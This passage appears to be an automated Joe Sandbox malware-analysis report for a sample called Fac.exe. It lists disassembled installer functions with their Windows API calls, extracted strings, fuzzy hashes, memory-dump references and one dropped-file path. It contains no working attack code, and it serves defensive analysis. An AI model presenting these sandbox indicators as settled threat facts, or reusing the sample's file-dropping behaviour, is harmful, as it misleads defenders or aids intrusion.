Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab
API String ID: 542301482-1793031794
Opcode ID: a149058ad8696085432c460d88ec71d3eef099888a8f5696d16856a4a3f09e5f
Instruction ID: 3f6190fb0288cb4cc2191ecfdaddaa4006c381b8c0a92558cc12242fdf246284
Opcode Fuzzy Hash: a149058ad8696085432c460d88ec71d3eef099888a8f5696d16856a4a3f09e5f
Instruction Fuzzy Hash: C9414B71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E0DBB99981CB54

Function 00402868 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402877

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 3ff8ad76b3b9f153c7fa26eaece9520d2f538018302aa55d80a0268ba0d10728
Instruction ID: 42b58e9376e2aae4a6b7d1f769ff68ee5b2b2e9610aeafae56754381977d23d8
Opcode Fuzzy Hash: 3ff8ad76b3b9f153c7fa26eaece9520d2f538018302aa55d80a0268ba0d10728
Instruction Fuzzy Hash: FCF08271A14104EFDB10EBA4DE499AEB378EF04314F6045BBF505F21E1DBB45D419B2A

Function 004043BA Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 204windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404458
GetDlgItem.USER32(?,000003E8), ref: 0040446C
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404489
GetSysColor.USER32(?), ref: 0040449A
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044A8
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044B6
lstrlenW.KERNEL32(?), ref: 004044BB
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044C8
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044DD
GetDlgItem.USER32(?,0000040A), ref: 00404536
SendMessageW.USER32(00000000), ref: 0040453D
GetDlgItem.USER32(?,000003E8), ref: 00404568
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045AB
LoadCursorW.USER32(00000000,00007F02), ref: 004045B9
SetCursor.USER32(00000000), ref: 004045BC
LoadCursorW.USER32(00000000,00007F00), ref: 004045D5
SetCursor.USER32(00000000), ref: 004045D8
SendMessageW.USER32(00000111,00000001,00000000), ref: 00404607
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404619

Strings

Call, xrefs: 00404597
1C@, xrefs: 004045C4
N, xrefs: 00404556

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: 1C@$Call$N
API String ID: 3103080414-3974410273
Opcode ID: 5f098caee5535ae1e7b5b61cf078335e238ade03d1551e6bec200614ec9300dd
Instruction ID: 9026ebbe03bb6d5dcd5a9bde039089338ffc2a6a86adc40c9d49ddbc6b033b78
Opcode Fuzzy Hash: 5f098caee5535ae1e7b5b61cf078335e238ade03d1551e6bec200614ec9300dd
Instruction Fuzzy Hash: D161A3B1A00209BFDB109F60DD45EAA7B79FB94305F00853AF705B62E0D779A952CF68

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00429200,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
Instruction ID: 53e7ac87f6412b54f62e8112edad18e9e8f6d31619aee210d26213a62ff7d26c
Opcode Fuzzy Hash: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
Instruction Fuzzy Hash: 88418A71800209AFCF058FA5DE459AF7BB9FF44310F00842AF991AA1A0C738D955DFA4

Function 00405ED0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040606B,?,?), ref: 00405F0B
GetShortPathNameW.KERNEL32(?,00426D88,00000400), ref: 00405F14

Part of subcall function 00405CDF: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CEF
Part of subcall function 00405CDF: lstrlenA.KERNEL32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D21

GetShortPathNameW.KERNEL32(?,00427588,00000400), ref: 00405F31
wsprintfA.USER32 ref: 00405F4F
GetFileSize.KERNEL32(00000000,00000000,00427588,C0000000,00000004,00427588,?,?,?,?,?), ref: 00405F8A
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F99
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD1
SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,00426988,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00406027
GlobalFree.KERNEL32(00000000), ref: 00406038
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040603F

Part of subcall function 00405D7A: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\Fac.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D7E
Part of subcall function 00405D7A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DA0

Strings

[Rename], xrefs: 00405FB9, 00405FCB
%ls=%ls, xrefs: 00405F45

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: 452d6bb901878c0c7833dd9b0da621d42dccc5e8693507b5b61e49e3263f6faa
Instruction ID: cb5629e100ec4411e7767e9ff1715c79388972a83a2f5f57e92a2ee479f5e204
Opcode Fuzzy Hash: 452d6bb901878c0c7833dd9b0da621d42dccc5e8693507b5b61e49e3263f6faa
Instruction Fuzzy Hash: 92313571240B19BBD230AB659D48F6B3A5CEF45744F15003BF906F72D2EA7C98118ABD

Function 00406518 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Fac.exe",00403334,C:\Users\user\AppData\Local\Temp\,77293420,004035A3,?,00000006,00000008,0000000A), ref: 0040657B
CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040658A
CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Fac.exe",00403334,C:\Users\user\AppData\Local\Temp\,77293420,004035A3,?,00000006,00000008,0000000A), ref: 0040658F
CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Fac.exe",00403334,C:\Users\user\AppData\Local\Temp\,77293420,004035A3,?,00000006,00000008,0000000A), ref: 004065A2

Strings

*?|<>/":, xrefs: 0040656A
"C:\Users\user\Desktop\Fac.exe", xrefs: 00406518
C:\Users\user\AppData\Local\Temp\, xrefs: 00406519, 0040651E

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\Fac.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-1605947809
Opcode ID: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
Instruction ID: 9d8e3f8f3784457604ea521ff392e3c8e3efc90107dbe880bee10e7696629eb6
Opcode Fuzzy Hash: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
Instruction Fuzzy Hash: AB11B655800616A5DB303B18BC44A7762F8AF54B60F92403FED89736C5F77C5C9286BD

Function 00404262 Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 0040427F
GetSysColor.USER32(00000000), ref: 004042BD
SetTextColor.GDI32(?,00000000), ref: 004042C9
SetBkMode.GDI32(?,?), ref: 004042D5
GetSysColor.USER32(?), ref: 004042E8
SetBkColor.GDI32(?,?), ref: 004042F8
DeleteObject.GDI32(?), ref: 00404312
CreateBrushIndirect.GDI32(?), ref: 0040431C

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
Instruction ID: 0f30b588a8d7f9bbf1461c481b53b443173021fc121084549064eaca6d41b1d8
Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
Instruction Fuzzy Hash: CD2174716007059FCB319F68DE48A5BBBF8AF81711B048A3EFD96A26E0D734D944CB54

Function 0040264A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A

Part of subcall function 00405E5B: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E71

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6

Strings

9, xrefs: 00402699

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: c1a2398a3cf68ffccba9bba39206efc2048042628f08e4a72376123c44d13fd0
Instruction ID: 3d8386ac743f87b5a59d0c6af2c48158715b6bf8f4fdb2ba716f86882e7a1e00
Opcode Fuzzy Hash: c1a2398a3cf68ffccba9bba39206efc2048042628f08e4a72376123c44d13fd0
Instruction Fuzzy Hash: 46510A74D10219AEDF219F95DA88AAEB779FF04304F50443BE901F72D1D7B49982CB58

Function 00404BB6 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BD1
GetMessagePos.USER32 ref: 00404BD9
ScreenToClient.USER32(?,?), ref: 00404BF3
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C05
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C2B

Strings

f, xrefs: 00404C07

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
Instruction ID: ae0188e128420319643ad50796f74bd77cac7447aa244d18a8bf097087cf05ab
Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
Instruction Fuzzy Hash: 9C019E7190021CBAEB00DB94DD81BFFBBBCAF95711F10412BBB10B61D0C7B499418BA4

Function 00402DF3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
MulDiv.KERNEL32(000B0641,00000064,000B0645), ref: 00402E3C
wsprintfW.USER32 ref: 00402E4C
SetWindowTextW.USER32(?,?), ref: 00402E5C
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E6E

Strings

verifying installer: %d%%, xrefs: 00402E46

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 66d2592fca5784473147c8150b099ced33c2aea089bdfd78c1b867d04e1d1f0a
Instruction ID: 4bcbb139cde21edcf0ff7b700e9789e452b98774f77cb7efe3bd4e4e9d403b43
Opcode Fuzzy Hash: 66d2592fca5784473147c8150b099ced33c2aea089bdfd78c1b867d04e1d1f0a
Instruction Fuzzy Hash: C701F47154020CABDF209F60DE49FAA3B69EB44705F008439FA45B51E0DBB995558F98

Function 7017256D Relevance: 9.1, APIs: 6, Instructions: 109COMMON

Download Yara Rule

APIs

Part of subcall function 7017121B: GlobalAlloc.KERNEL32(00000040,?,7017123B,?,701712DF,00000019,701711BE,-000000A0), ref: 70171225

GlobalFree.KERNEL32(?), ref: 7017265B
GlobalFree.KERNEL32(00000000), ref: 70172690

Memory Dump Source

Source File: 00000000.00000002.42445740510.0000000070171000.00000020.00000001.01000000.00000004.sdmp, Offset: 70170000, based on PE: true

Associated: 00000000.00000002.42445700312.0000000070170000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.42445795216.0000000070173000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.42445848499.0000000070175000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70170000_Fac.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 70cf2358891e64d564d912496bf73eb25c527061abc2618b695fc9bef98d3a83
Instruction ID: d0df36d482eb98766598954a4d02777d8fea397307f1e1e325b765cc36545692
Opcode Fuzzy Hash: 70cf2358891e64d564d912496bf73eb25c527061abc2618b695fc9bef98d3a83
Instruction Fuzzy Hash: E931F672604101EFC7168F55CC98D6EB7BBFB89304731A5AEFA8287A34D730A946DB11

Function 004028AD Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
GlobalFree.KERNEL32(?), ref: 00402956
GlobalFree.KERNEL32(00000000), ref: 00402969
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: de92c1bd6f77b34e2ba4b4bc505dbe4f635d2773414333dd82a7c43b5c6c5a79
Instruction ID: 08f8d52deffd015bf7aba9006bc7b8b19cff7c85b8e7ef16137ebd65050c2e74
Opcode Fuzzy Hash: de92c1bd6f77b34e2ba4b4bc505dbe4f635d2773414333dd82a7c43b5c6c5a79
